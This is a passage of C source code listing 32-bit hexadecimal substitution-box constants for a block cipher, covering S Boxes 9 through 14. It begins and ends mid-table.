0x26c6a4d5L,0x5c0055b6L,0x2376102eL,0x0411783eL,0x2aa3f1cdL, /* 85*/ 0x51fc6ea8L,0x701ce243L,0x9b2a0abbL,0x0ad93733L,0x6e80d03dL, /* 90*/ 0xaf6295d1L,0xf629896fL,0xa30b0648L,0x463d8dd4L,0x963f84cbL, /* 95*/ 0x01ff94f8L,0x8d7fefdcL,0x553611c0L,0xa97c1719L,0xb96af759L, /* 100*/ 0xe0e3c95eL,0x0528335bL,0x21fe5925L,0x821a5245L,0x807238b1L, /* 105*/ 0x67f23db5L,0xea6b4eabL,0x0da6f985L,0xab1bc85aL,0xef8c90e4L, /* 110*/ 0x4526230eL,0x38eb8b1cL,0x1b91cd91L,0x9fce5f0cL,0xf72cc72bL, /* 115*/ 0xc64f2617L,0xdaf7857dL,0x7d373cf1L,0x28eaedd7L,0x203887d0L, /* 120*/ 0xc49a155fL,0xa251b3b0L,0xf2d47ae3L,0x3d9ef267L,0x4a94ab2fL, /* 125*/ 0x7755a222L,0x0205e329L,0xc28fa7a7L,0xaec1fe51L,0x270f164cL, /* 130*/ 0x8c6d01bfL,0x53b5bc98L,0xc09d3febL,0x834986ccL,0x4309a12cL, /* 135*/ 0x578b2a96L,0x3bb74b86L,0x69561b4aL,0x037e32f3L,0xde335b08L, /* 140*/ 0xc5156be0L,0xe7ef09adL,0x93b834c7L,0xa7719352L,0x59302821L, /* 145*/ 
0xe3529d26L,0xf961da76L,0xcb142c44L,0xa0f3b98dL,0x76502457L, /* 150*/ 0x945a414bL,0x078eeb12L,0xdff8de69L,0xeb6c8c2dL,0xbda90c4dL, /* 155*/ 0xe9c44d16L,0x168dfd66L,0xad64763bL,0xa65fd764L,0x95a29c06L, /* 160*/ 0x32d7713fL,0x40f0b277L,0x224af08fL,0x004cb5e8L,0x92574814L, /* 165*/ 0x8877d827L,0x3e5b2d04L,0x68c2d5f2L,0x86966273L,0x1d433adaL, /* 170*/ 0x8774988aL,0x3c0e0bfeL,0xddad581dL,0x2fd654edL,0x0f4769fdL, /* 175*/ 0xc181ee9dL,0x5fd88f61L,0x341dbb3aL,0x528543f9L,0xd92235cfL, /* 180*/ 0x1ea82eb4L,0xb5cd790fL,0x91d24f1eL,0xa869e6c2L,0x61f474d2L, /* 185*/ 0xcc205addL,0x0c7bfba9L,0xbf2b0489L,0xb02d72d8L,0x2b46ece6L, /* 190*/ 0xe4dcd90aL,0xb8a11440L,0xee8a63b7L,0x854dd1a1L,0xd1e00583L, /* 195*/ 0x42b40e24L,0x9e8964deL,0xb4b35d78L,0xbec76f6eL,0x24b9c620L, /* 200*/ 0xd8d399a6L,0x5adb2190L,0x2db12730L,0x3a5866afL,0x58c8fadbL, /* 205*/ 0x5d8844e7L,0x8a4bf380L,0x15a01d70L,0x79f5c028L,0x66be3b8cL, /* 210*/ 0xf3e42b53L,0x56990039L,0x2c0c3182L,0x5e16407cL,0xecc04515L, /* 215*/ 0x6c440284L,0x4cb6701aL,0x13bfc142L,0x9d039f6aL,0x4f6e92c8L, /* 220*/ 0xa1407c62L,0x8483a095L,0xc70ae1c4L,0xe20213a2L,0xbacafc41L, /* 225*/ 0x4ecc12b3L,0x4bee3646L,0x1fe807aeL,0x25217f9cL,0x35dde5f5L, /* 230*/ 0x7a7dd6ceL,0xf89cce50L,0xac07b718L,0x7e73d2c6L,0xe563e76cL, /* 235*/ 0x123ca536L,0x3948ca56L,0x9019dd49L,0x10aa88d9L,0xc82451e2L, /* 240*/ 0x473eb6d6L,0x506fe854L,0xe8bb03a5L,0x332f4c32L,0xfe1e1e72L, /* 245*/ 0xb1ae572aL,0x7c0d7bc1L,0xe1c37eb2L,0xf542aa60L,0xf1a48ea0L, /* 250*/ 0xd067b89fL,0xbbfa195dL,0x1a049b0dL,0x315946aaL,0x36d1b447L, /* 255*/ 0x6d2ebdf0L /* End of S Box 9 */ }, { /* Start of S Box 10 */ /* 0*/ 0x0d188a6dL,0x12cea0dbL,0x7e63740eL,0x6a444821L,0x253d234fL, /* 5*/ 0x6ffc6597L,0x94a6bdefL,0x33ee1b2fL,0x0a6c00c0L,0x3aa336b1L, /* 10*/ 0x5af55d17L,0x265fb3dcL,0x0e89cf4dL,0x0786b008L,0xc80055b8L, /* 15*/ 0x6b17c3ceL,0x72b05a74L,0xd21a8d78L,0xa6b70840L,0xfe8eae77L, /* 20*/ 0xed69565cL,0x55e1bcf4L,0x585c2f60L,0xe06f1a62L,0xad67c0cdL, /* 25*/ 
0x7712af88L,0x9cc26acaL,0x1888053dL,0x37eb853eL,0x9215abd7L, /* 30*/ 0xde30adfcL,0x1f1038e6L,0x70c51c8aL,0x8d586c26L,0xf72bdd90L, /* 35*/ 0x4dc3ce15L,0x68eaeefaL,0xd0e9c8b9L,0x200f9c44L,0xddd141baL, /* 40*/ 0x024bf1d3L,0x0f64c9d4L,0xc421e9e9L,0x9d11c14cL,0x9a0dd9e4L, /* 45*/ 0x5f92ec19L,0x1b980df0L,0x1dcc4542L,0xb8fe8c56L,0x0c9c9167L, /* 50*/ 0x4e81eb49L,0xca368f27L,0xe3603b37L,0xea08acccL,0xac516992L, /* 55*/ 0xc34f513bL,0x804d100dL,0x6edca4c4L,0xfc912939L,0x29d219b0L, /* 60*/ 0x278aaa3cL,0x4868da7dL,0x54e890b7L,0xb46d735aL,0x514589aaL, /* 65*/ 0xd6c630afL,0x4980dfe8L,0xbe3ccc55L,0x59d41202L,0x650c078bL, /* 70*/ 0xaf3a9e7bL,0x3ed9827aL,0x9e79fc6eL,0xaadbfbaeL,0xc5f7d803L, /* 75*/ 0x3daf7f50L,0x67b4f465L,0x73406e11L,0x39313f8cL,0x8a6e6686L, /* 80*/ 0xd8075f1fL,0xd3cbfed1L,0x69c7e49cL,0x930581e0L,0xe4b1a5a8L, /* 85*/ 0xbbc45472L,0x09ddbf58L,0xc91d687eL,0xbdbffda5L,0x88c08735L, /* 90*/ 0xe9e36bf9L,0xdb5ea9b6L,0x95559404L,0x08f432fbL,0xe24ea281L, /* 95*/ 0x64663579L,0x000b8010L,0x7914e7d5L,0x32fd0473L,0xd1a7f0a4L, /* 100*/ 0x445ab98eL,0xec72993fL,0xa29a4d32L,0xb77306d8L,0xc7c97cf6L, /* 105*/ 0x7b6ab645L,0xf5ef7adfL,0xfb2e15f7L,0xe747f757L,0x5e944354L, /* 110*/ 0x234a2669L,0x47e46359L,0x9b9d11a9L,0x40762cedL,0x56f1de98L, /* 115*/ 0x11334668L,0x890a9a70L,0x1a296113L,0xb3bd4af5L,0x163b7548L, /* 120*/ 0xd51b4f84L,0xb99b2abcL,0x3cc1dc30L,0xa9f0b56cL,0x812272b2L, /* 125*/ 0x0b233a5fL,0xb650dbf2L,0xf1a0771bL,0x36562b76L,0xdc037b0fL, /* 130*/ 0x104c97ffL,0xc2ec98d2L,0x90596f22L,0x28b6620bL,0xdf42b212L, /* 135*/ 0xfdbc4243L,0xf3fb175eL,0x4a2d8b00L,0xe8f3869bL,0x30d69bc3L, /* 140*/ 0x853714c8L,0xa7751d2eL,0x31e56deaL,0xd4840b0cL,0x9685d783L, /* 145*/ 0x068c9333L,0x8fba032cL,0x76d7bb47L,0x6d0ee22bL,0xb546794bL, /* 150*/ 0xd971b894L,0x8b09d253L,0xa0ad5761L,0xee77ba06L,0x46359f31L, /* 155*/ 0x577cc7ecL,0x52825efdL,0xa4beed95L,0x9825c52aL,0xeb48029aL, /* 160*/ 0xbaae59f8L,0xcf490ee1L,0xbc990164L,0x8ca49dfeL,0x4f38a6e7L, /* 165*/ 
0x2ba98389L,0x8228f538L,0x199f64acL,0x01a1cac5L,0xa8b51641L, /* 170*/ 0x5ce72d01L,0x8e5df26bL,0x60f28e1eL,0xcd5be125L,0xe5b376bfL, /* 175*/ 0x1c8d3116L,0x7132cbb3L,0xcb7ae320L,0xc0fa5366L,0xd7653e34L, /* 180*/ 0x971c88c2L,0xc62c7dd0L,0x34d0a3daL,0x868f6709L,0x7ae6fa8fL, /* 185*/ 0x22bbd523L,0x66cd3d5bL,0x1ef9288dL,0xf9cf58c1L,0x5b784e80L, /* 190*/ 0x7439a191L,0xae134c36L,0x9116c463L,0x2e9e1396L,0xf8611f3aL, /* 195*/ 0x2d2f3307L,0x247f37ddL,0xc1e2ff9dL,0x43c821e5L,0x05ed5cabL, /* 200*/ 0xef74e80aL,0x4cca6028L,0xf0ac3cbdL,0x5d874b29L,0x6c62f6a6L, /* 205*/ 0x4b2a2ef3L,0xb1aa2087L,0x62a5d0a3L,0x0327221cL,0xb096b4c6L, /* 210*/ 0x417ec693L,0xaba840d6L,0x789725ebL,0xf4b9e02dL,0xe6e00975L, /* 215*/ 0xcc04961aL,0x63f624bbL,0x7fa21ecbL,0x2c01ea7fL,0xb2415005L, /* 220*/ 0x2a8bbeb5L,0x83b2b14eL,0xa383d1a7L,0x5352f96aL,0x043ecdadL, /* 225*/ 0xce1918a1L,0xfa6be6c9L,0x50def36fL,0xf6b80ce2L,0x4543ef7cL, /* 230*/ 0x9953d651L,0xf257955dL,0x87244914L,0xda1e0a24L,0xffda4785L, /* 235*/ 0x14d327a2L,0x3b93c29fL,0x840684b4L,0x61ab71a0L,0x9f7b784aL, /* 240*/ 0x2fd570cfL,0x15955bdeL,0x38f8d471L,0x3534a718L,0x133fb71dL, /* 245*/ 0x3fd80f52L,0x4290a8beL,0x75ff44c7L,0xa554e546L,0xe1023499L, /* 250*/ 0xbf2652e3L,0x7d20399eL,0xa1df7e82L,0x177092eeL,0x217dd3f1L, /* 255*/ 0x7c1ff8d9L /* End of S Box 10 */ }, { /* Start of S Box 11 */ /* 0*/ 0x12113f2eL,0xbfbd0785L,0xf11793fbL,0xa5bff566L,0x83c7b0e5L, /* 5*/ 0x72fb316bL,0x75526a9aL,0x41e0e612L,0x7156ba09L,0x53ce7deeL, /* 10*/ 0x0aa26881L,0xa43e0d7dL,0x3da73ca3L,0x182761edL,0xbd5077ffL, /* 15*/ 0x56db4aa0L,0xe792711cL,0xf0a4eb1dL,0x7f878237L,0xec65c4e8L, /* 20*/ 0x08dc8d43L,0x0f8ce142L,0x8258abdaL,0xf4154e16L,0x49dec2fdL, /* 25*/ 0xcd8d5705L,0x6c2c3a0fL,0x5c12bb88L,0xeff3cdb6L,0x2c89ed8cL, /* 30*/ 0x7beba967L,0x2a142157L,0xc6d0836fL,0xb4f97e96L,0x6931e969L, /* 35*/ 0x514e6c7cL,0xa7792600L,0x0bbbf780L,0x59671bbdL,0x0707b676L, /* 40*/ 0x37482d93L,0x80af1479L,0x3805a60dL,0xe1f4cac1L,0x580b3074L, /* 45*/ 
0x30b8d6ceL,0x05a304beL,0xd176626dL,0xebca97f3L,0xbb201f11L, /* 50*/ 0x6a1afe23L,0xffaa86e4L,0x62b4da49L,0x1b6629f5L,0xf5d9e092L, /* 55*/ 0xf37f3dd1L,0x619bd45bL,0xa6ec8e4fL,0x29c80939L,0x0c7c0c34L, /* 60*/ 0x9cfe6e48L,0xe65fd3acL,0x73613b65L,0xb3c669f9L,0xbe2e8a9eL, /* 65*/ 0x286f9678L,0x5797fd13L,0x99805d75L,0xcfb641c5L,0xa91074baL, /* 70*/ 0x6343af47L,0x6403cb46L,0x8894c8dbL,0x2663034cL,0x3c40dc5eL, /* 75*/ 0x00995231L,0x96789aa2L,0x2efde4b9L,0x7dc195e1L,0x547dadd5L, /* 80*/ 0x06a8ea04L,0xf2347a63L,0x5e0dc6f7L,0x8462dfc2L,0x1e6b2c3cL, /* 85*/ 0x9bd275b3L,0x91d419e2L,0xbcefd17eL,0xb9003924L,0xd07e7320L, /* 90*/ 0xdef0495cL,0xc36ad00eL,0x1785b1abL,0x92e20bcfL,0xb139f0e9L, /* 95*/ 0x675bb9a1L,0xaecfa4afL,0x132376cbL,0xe84589d3L,0x79a05456L, /* 100*/ 0xa2f860bcL,0x1ae4f8b5L,0x20df4db4L,0xa1e1428bL,0x3bf60a1aL, /* 105*/ 0x27ff7bf1L,0xcb44c0e7L,0xf7f587c4L,0x1f3b9b21L,0x94368f01L, /* 110*/ 0x856e23a4L,0x6f93de3fL,0x773f5bbfL,0x8b22056eL,0xdf41f654L, /* 115*/ 0xb8246ff4L,0x8d57bff2L,0xd57167eaL,0xc5699f22L,0x40734ba7L, /* 120*/ 0x5d5c2772L,0x033020a8L,0xe30a7c4dL,0xadc40fd6L,0x76353441L, /* 125*/ 0x5aa5229bL,0x81516590L,0xda49f14eL,0x4fa672a5L,0x4d9fac5fL, /* 130*/ 0x154be230L,0x8a7a5cc0L,0xce3d2f84L,0xcca15514L,0x5221360cL, /* 135*/ 0xaf0fb81eL,0x5bdd5873L,0xf6825f8fL,0x1113d228L,0x70ad996cL, /* 140*/ 0x93320051L,0x60471c53L,0xe9ba567bL,0x3a462ae3L,0x5f55e72dL, /* 145*/ 0x1d3c5ad7L,0xdcfc45ecL,0x34d812efL,0xfa96ee1bL,0x369d1ef8L, /* 150*/ 0xc9b1a189L,0x7c1d3555L,0x50845edcL,0x4bb31877L,0x8764a060L, /* 155*/ 0x8c9a9415L,0x230e1a3aL,0xb05e9133L,0x242b9e03L,0xa3b99db7L, /* 160*/ 0xc2d7fb0aL,0x3333849dL,0xd27278d4L,0xb5d3efa6L,0x78ac28adL, /* 165*/ 0xc7b2c135L,0x0926ecf0L,0xc1374c91L,0x74f16d98L,0x2274084aL, /* 170*/ 0x3f6d9cfaL,0x7ac0a383L,0xb73aff1fL,0x3909a23dL,0x9f1653aeL, /* 175*/ 0x4e2f3e71L,0xca5ab22aL,0xe01e3858L,0x90c5a7ebL,0x3e4a17dfL, /* 180*/ 0xaa987fb0L,0x488bbd62L,0xb625062bL,0x2d776bb8L,0x43b5fc08L, /* 185*/ 
0x1490d532L,0xd6d12495L,0x44e89845L,0x2fe60118L,0x9d9ef950L, /* 190*/ 0xac38133eL,0xd3864329L,0x017b255aL,0xfdc2dd26L,0x256851e6L, /* 195*/ 0x318e7086L,0x2bfa4861L,0x89eac706L,0xee5940c6L,0x68c3bc2fL, /* 200*/ 0xe260334bL,0x98da90bbL,0xf818f270L,0x4706d897L,0x212d3799L, /* 205*/ 0x4cf7e5d0L,0xd9c9649fL,0xa85db5cdL,0x35e90e82L,0x6b881152L, /* 210*/ 0xab1c02c7L,0x46752b02L,0x664f598eL,0x45ab2e64L,0xc4cdb4b2L, /* 215*/ 0xba42107fL,0xea2a808aL,0x971bf3deL,0x4a54a836L,0x4253aeccL, /* 220*/ 0x1029be68L,0x6dcc9225L,0xe4bca56aL,0xc0ae50b1L,0x7e011d94L, /* 225*/ 0xe59c162cL,0xd8e5c340L,0xd470fa0bL,0xb2be79ddL,0xd783889cL, /* 230*/ 0x1cede8f6L,0x8f4c817aL,0xddb785c9L,0x860232d8L,0x198aaad9L, /* 235*/ 0xa0814738L,0x3219cffcL,0x169546d2L,0xfc0cb759L,0x55911510L, /* 240*/ 0x04d5cec3L,0xed08cc3bL,0x0d6cf427L,0xc8e38ccaL,0x0eeee3feL, /* 245*/ 0x9ee7d7c8L,0xf9f24fa9L,0xdb04b35dL,0x9ab0c9e0L,0x651f4417L, /* 250*/ 0x028f8b07L,0x6e28d9aaL,0xfba96319L,0x8ed66687L,0xfecbc58dL, /* 255*/ 0x954ddb44L /* End of S Box 11 */ }, { /* Start of S Box 12 */ /* 0*/ 0x7b0bdffeL,0x865d16b1L,0x49a058c0L,0x97abaa3fL,0xcaacc75dL, /* 5*/ 0xaba6c17dL,0xf8746f92L,0x6f48aeedL,0x8841d4b5L,0xf36a146aL, /* 10*/ 0x73c390abL,0xe6fb558fL,0x87b1019eL,0x26970252L,0x246377b2L, /* 15*/ 0xcbf676aeL,0xf923db06L,0xf7389116L,0x14c81a90L,0x83114eb4L, /* 20*/ 0x8b137559L,0x95a86a7aL,0xd5b8da8cL,0xc4df780eL,0x5a9cb3e2L, /* 25*/ 0xe44d4062L,0xe8dc8ef6L,0x9d180845L,0x817ad18bL,0xc286c85bL, /* 30*/ 0x251f20deL,0xee6d5933L,0xf6edef81L,0xd4d16c1eL,0xc94a0c32L, /* 35*/ 0x8437fd22L,0x3271ee43L,0x42572aeeL,0x5f91962aL,0x1c522d98L, /* 40*/ 0x59b23f0cL,0xd86b8804L,0x08c63531L,0x2c0d7a40L,0xb97c4729L, /* 45*/ 0x04964df9L,0x13c74a17L,0x5878362fL,0x4c808cd6L,0x092cb1e0L, /* 50*/ 0x6df02885L,0xa0c2105eL,0x8aba9e68L,0x64e03057L,0xe5d61325L, /* 55*/ 0x0e43a628L,0x16dbd62bL,0x2733d90bL,0x3ae57283L,0xc0c1052cL, /* 60*/ 0x4b6fb620L,0x37513953L,0xfc898bb3L,0x471b179fL,0xdf6e66b8L, /* 65*/ 
0xd32142f5L,0x9b30fafcL,0x4ed92549L,0x105c6d99L,0x4acd69ffL, /* 70*/ 0x2b1a27d3L,0x6bfcc067L,0x6301a278L,0xad36e6f2L,0xef3ff64eL, /* 75*/ 0x56b3cadbL,0x0184bb61L,0x17beb9fdL,0xfaec6109L,0xa2e1ffa1L, /* 80*/ 0x2fd224f8L,0x238f5be6L,0x8f8570cfL,0xaeb5f25aL,0x4f1d3e64L, /* 85*/ 0x4377eb24L,0x1fa45346L,0xb2056386L,0x52095e76L,0xbb7b5adcL, /* 90*/ 0x3514e472L,0xdde81e6eL,0x7acea9c4L,0xac15cc48L,0x71c97d93L, /* 95*/ 0x767f941cL,0x911052a2L,0xffea09bfL,0xfe3ddcf0L,0x15ebf3aaL, /* 100*/ 0x9235b8bcL,0x75408615L,0x9a723437L,0xe1a1bd38L,0x33541b7eL, /* 105*/ 0x1bdd6856L,0xb307e13eL,0x90814bb0L,0x51d7217bL,0x0bb92219L, /* 110*/ 0x689f4500L,0xc568b01fL,0x5df3d2d7L,0x3c0ecd0dL,0x2a0244c8L, /* 115*/ 0x852574e8L,0xe72f23a9L,0x8e26ed02L,0x2d92cbddL,0xdabc0458L, /* 120*/ 0xcdf5feb6L,0x9e4e8dccL,0xf4f1e344L,0x0d8c436dL,0x4427603bL, /* 125*/ 0xbdd37fdaL,0x80505f26L,0x8c7d2b8eL,0xb73273c5L,0x397362eaL, /* 130*/ 0x618a3811L,0x608bfb88L,0x06f7d714L,0x212e4677L,0x28efceadL, /* 135*/ 0x076c0371L,0x36a3a4d9L,0x5487b455L,0x3429a365L,0x65d467acL, /* 140*/ 0x78ee7eebL,0x99bf12b7L,0x4d129896L,0x772a5601L,0xcce284c7L, /* 145*/ 0x2ed85c21L,0xd099e8a4L,0xa179158aL,0x6ac0ab1aL,0x299a4807L, /* 150*/ 0xbe67a58dL,0xdc19544aL,0xb8949b54L,0x8d315779L,0xb6f849c1L, /* 155*/ 0x53c5ac34L,0x66de92a5L,0xf195dd13L,0x318d3a73L,0x301ec542L, /* 160*/ 0x0cc40da6L,0xf253ade4L,0x467ee566L,0xea5585ecL,0x3baf19bbL, /* 165*/ 0x7de9f480L,0x79006e7cL,0xa9b7a197L,0xa44bd8f1L,0xfb2ba739L, /* 170*/ 0xec342fd4L,0xed4fd32dL,0x3d1789baL,0x400f5d7fL,0xc798f594L, /* 175*/ 0x4506a847L,0x034c0a95L,0xe2162c9dL,0x55a9cfd0L,0x692d832eL, /* 180*/ 0xcf9db2caL,0x5e2287e9L,0xd2610ef3L,0x1ae7ecc2L,0x48399ca0L, /* 185*/ 0xa7e4269bL,0x6ee3a0afL,0x7065bfe1L,0xa6ffe708L,0x2256804cL, /* 190*/ 0x7476e21bL,0x41b0796cL,0x7c243b05L,0x000a950fL,0x1858416bL, /* 195*/ 0xf5a53c89L,0xe9fef823L,0x3f443275L,0xe0cbf091L,0x0af27b84L, /* 200*/ 0x3ebb0f27L,0x1de6f7f4L,0xc31c29f7L,0xb166de3dL,0x12932ec3L, /* 205*/ 
0x9c0c0674L,0x5cda81b9L,0xd1bd9d12L,0xaffd7c82L,0x8962bca7L, /* 210*/ 0xa342c4a8L,0x62457151L,0x82089f03L,0xeb49c670L,0x5b5f6530L, /* 215*/ 0x7e28bad2L,0x20880ba3L,0xf0faafcdL,0xce82b56fL,0x0275335cL, /* 220*/ 0xc18e8afbL,0xde601d69L,0xba9b820aL,0xc8a2be4fL,0xd7cac335L, /* 225*/ 0xd9a73741L,0x115e974dL,0x7f5ac21dL,0x383bf9c6L,0xbcaeb75fL, /* 230*/ 0xfd0350ceL,0xb5d06b87L,0x9820e03cL,0x72d5f163L,0xe3644fc9L, /* 235*/ 0xa5464c4bL,0x57048fcbL,0x9690c9dfL,0xdbf9eafaL,0xbff4649aL, /* 240*/ 0x053c00e3L,0xb4b61136L,0x67593dd1L,0x503ee960L,0x9fb4993aL, /* 245*/ 0x19831810L,0xc670d518L,0xb05b51d8L,0x0f3a1ce5L,0x6caa1f9cL, /* 250*/ 0xaacc31beL,0x949ed050L,0x1ead07e7L,0xa8479abdL,0xd6cffcd5L, /* 255*/ 0x936993efL /* End of S Box 12 */ }, { /* Start of S Box 13 */ /* 0*/ 0x472e91cbL,0x5444b5b6L,0x62be5861L,0x1be102c7L,0x63e4b31eL, /* 5*/ 0xe81f71b7L,0x9e2317c9L,0x39a408aeL,0x518024f4L,0x1731c66fL, /* 10*/ 0x68cbc918L,0x71fb0c9eL,0xd03b7fddL,0x7d6222ebL,0x9057eda3L, /* 15*/ 0x1a34a407L,0x8cc2253dL,0xb6f6979dL,0x835675dcL,0xf319be9fL, /* 20*/ 0xbe1cd743L,0x4d32fee4L,0x77e7d887L,0x37e9ebfdL,0x15f851e8L, /* 25*/ 0x23dc3706L,0x19d78385L,0xbd506933L,0xa13ad4a6L,0x913f1a0eL, /* 30*/ 0xdde560b9L,0x9a5f0996L,0xa65a0435L,0x48d34c4dL,0xe90839a7L, /* 35*/ 0x8abba54eL,0x6fd13ce1L,0xc7eebd3cL,0x0e297602L,0x58b9bbb4L, /* 40*/ 0xef7901e6L,0x64a28a62L,0xa509875aL,0xf8834442L,0x2702c709L, /* 45*/ 0x07353f31L,0x3b39f665L,0xf5b18b49L,0x4010ae37L,0x784de00bL, /* 50*/ 0x7a1121e9L,0xde918ed3L,0xc8529dcdL,0x816a5d05L,0x02ed8298L, /* 55*/ 0x04e3dd84L,0xfd2bc3e2L,0xaf167089L,0x96af367eL,0xa4da6232L, /* 60*/ 0x18ff7325L,0x05f9a9f1L,0x4fefb9f9L,0xcd94eaa5L,0xbfaa5069L, /* 65*/ 0xa0b8c077L,0x60d86f57L,0xfe71c813L,0x29ebd2c8L,0x4ca86538L, /* 70*/ 0x6bf1a030L,0xa237b88aL,0xaa8af41dL,0xe1f7b6ecL,0xe214d953L, /* 75*/ 0x33057879L,0x49caa736L,0xfa45cff3L,0xc063b411L,0xba7e27d0L, /* 80*/ 0x31533819L,0x2a004ac1L,0x210efc3fL,0x2646885eL,0x66727dcfL, /* 85*/ 
0x9d7fbf54L,0xa8dd0ea8L,0x3447caceL,0x3f0c14dbL,0xb8382aacL, /* 90*/ 0x4ace3539L,0x0a518d51L,0x95178981L,0x35aee2caL,0x73f0f7e3L, /* 95*/ 0x94281140L,0x59d0e523L,0xd292cb88L,0x565d1b27L,0x7ec8fbafL, /* 100*/ 0x069af08dL,0xc127fd24L,0x0bc77b10L,0x5f03e7efL,0x453e99baL, /* 105*/ 0xeed9ff7fL,0x87b55215L,0x7915ab4cL,0xd389a358L,0x5e75ce6dL, /* 110*/ 0x28d655c0L,0xdad26c73L,0x2e2510ffL,0x9fa7eeccL,0x1d0629c3L, /* 115*/ 0xdc9c9c46L,0x2d67ecd7L,0xe75e94bdL,0x3d649e2aL,0x6c413a2bL, /* 120*/ 0x706f0d7cL,0xdfb0127bL,0x4e366b55L,0x2c825650L,0x24205720L, /* 125*/ 0xb5c998f7L,0x3e95462cL,0x756e5c72L,0x3259488fL,0x11e8771aL, /* 130*/ 0xa7c0a617L,0x577663e5L,0x089b6401L,0x8eab1941L,0xae55ef8cL, /* 135*/ 0x3aac5460L,0xd4e6262fL,0x5d979a47L,0xb19823b0L,0x7f8d6a0cL, /* 140*/ 0xffa08683L,0x0170cd0fL,0x858cd5d8L,0x53961c90L,0xc4c61556L, /* 145*/ 0x41f2f226L,0xcfcd062dL,0xf24c03b8L,0xea81df5bL,0x7be2fa52L, /* 150*/ 0xb361f98bL,0xc2901316L,0x55ba4bbcL,0x93b234a9L,0x0fbc6603L, /* 155*/ 0x80a96822L,0x6d60491fL,0x22bd00f8L,0xbcad5aadL,0x52f3f13bL, /* 160*/ 0x42fd2b28L,0xb41dd01cL,0xc52c93bfL,0xfc663094L,0x8f58d100L, /* 165*/ 0x43fecc08L,0xc6331e5dL,0xe6480f66L,0xca847204L,0x4bdf1da0L, /* 170*/ 0x30cc2efbL,0x13e02deaL,0xfb49ac45L,0xf9d4434fL,0xf47c5b9cL, /* 175*/ 0x148879c2L,0x039fc234L,0xa3db9bfcL,0xd1a1dc5cL,0x763d7cd4L, /* 180*/ 0xed6d2f93L,0xab13af6eL,0x1e8e054aL,0xd68f4f9aL,0xc30484b3L, /* 185*/ 0xd7d50afaL,0x6930855fL,0xcc07db95L,0xce746db1L,0x744e967dL, /* 190*/ 0xf16cf575L,0x8643e8b5L,0xf0eae38eL,0xe52de1d1L,0x6587dae0L, /* 195*/ 0x0c4b8121L,0x1c7ac567L,0xac0db20aL,0x36c3a812L,0x5b1a4514L, /* 200*/ 0xa9a3f868L,0xb9263baaL,0xcb3ce9d2L,0xe44fb1a4L,0x9221bc82L, /* 205*/ 0xb29390feL,0x6ab41863L,0x974a3e2eL,0x89f531c5L,0x255ca13eL, /* 210*/ 0x8b65d348L,0xec248f78L,0xd8fc16f0L,0x50ecdeeeL,0x09010792L, /* 215*/ 0x3c7d1fb2L,0xeba5426bL,0x847b417aL,0x468b40d9L,0x8dc4e680L, /* 220*/ 0x7cc1f391L,0x2f1eb086L,0x6e5baa6aL,0xe0b395daL,0xe31b2cf6L, /* 225*/ 
0xd9690b0dL,0x729ec464L,0x38403ddeL,0x610b80a2L,0x5cf433abL, /* 230*/ 0xb0785fc4L,0xd512e4c6L,0xbbb7d699L,0x5a86591bL,0x10cf5376L, /* 235*/ 0x12bf9f4bL,0x980fbaa1L,0x992a4e70L,0x20fa7ae7L,0xf7996ebbL, /* 240*/ 0xc918a2beL,0x82de74f2L,0xad54209bL,0xf66b4d74L,0x1fc5b771L, /* 245*/ 0x169d9229L,0x887761dfL,0x00b667d5L,0xdb425e59L,0xb72f2844L, /* 250*/ 0x9b0ac1f5L,0x9c737e3aL,0x2b85476cL,0x6722add6L,0x44a63297L, /* 255*/ 0x0d688cedL /* End of S Box 13 */ }, { /* Start of S Box 14 */ /* 0*/ 0xabc59484L,0x4107778aL,0x8ad94c6fL,0xfe83df90L,0x0f64053fL, /* 5*/ 0xd1292e9dL,0xc5744356L,0x8dd1abb4L,0x4c4e7667L,0xfb4a7fc1L, /* 10*/ 0x74f402cbL,0x70f06afdL,0xa82286f2L,0x918dd076L,0x7a97c5ceL, /* 15*/ 0x48f7bde3L,0x6a04d11dL,0xac243ef7L,0x33ac10caL,0x2f7a341eL, /* 20*/ 0x5f75157aL,0xf4773381L,0x591c870eL,0x78df8cc8L,0x22f3adb0L, /* 25*/ 0x251a5993L,0x09fbef66L,0x796942a8L,0x97541d2eL,0x2373daa9L, /* 30*/ 0x1bd2f142L,0xb57e8eb2L,0xe1a5bfdbL,0x7d0efa92L,0xb3442c94L, /* 35*/ 0xd2cb6447L,0x386ac97eL,0x66d61805L,0xbdada15eL,0x11bc1aa7L, /* 40*/ 0x14e9f6eaL,0xe533a0c0L,0xf935ee0aL,0x8fee8a04L,0x810d6d85L, /* 45*/ 0x7c68b6d6L,0x4edc9aa2L,0x956e897dL,0xed87581aL,0x264be9d7L, /* 50*/ 0xff4ddb29L,0x823857c2L,0xe005a9a0L,0xf1cc2450L,0x6f9951e1L, /* 55*/ 0xaade2310L,0xe70c75f5L,0x83e1a31fL,0x4f7dde8eL,0xf723b563L, /* 60*/ 0x368e0928L,0x86362b71L,0x21e8982dL,0xdfb3f92bL,0x44676352L, /* 65*/ 0x99efba31L,0x2eab4e1cL,0xfc6ca5e7L,0x0ebe5d4eL,0xa0717d0cL, /* 70*/ 0xb64f8199L,0x946b31a1L,0x5656cbc6L,0xcffec3efL,0x622766c9L, /* 75*/ 0xfa211e35L,0x52f98b89L,0x6d01674bL,0x4978a802L,0xf651f701L, /* 80*/ 0x15b0d43dL,0xd6ff4683L,0x3463855fL,0x672ba29cL,0xbc128312L, /* 85*/ 0x4626a70dL,0xc8927a5aL,0xb8481cf9L,0x1c962262L,0xa21196baL, /* 90*/ 0xbaba5ee9L,0x5bb162d0L,0x69943bd1L,0x0c47e35cL,0x8cc9619aL, /* 95*/ 0xe284d948L,0x271bf264L,0xc27fb398L,0x4bc70897L,0x60cf202cL, /* 100*/ 0x7f42d6aaL,0xa5a13506L,0x5d3e8860L,0xcea63d3cL,0x63bf0a8fL, /* 105*/ 
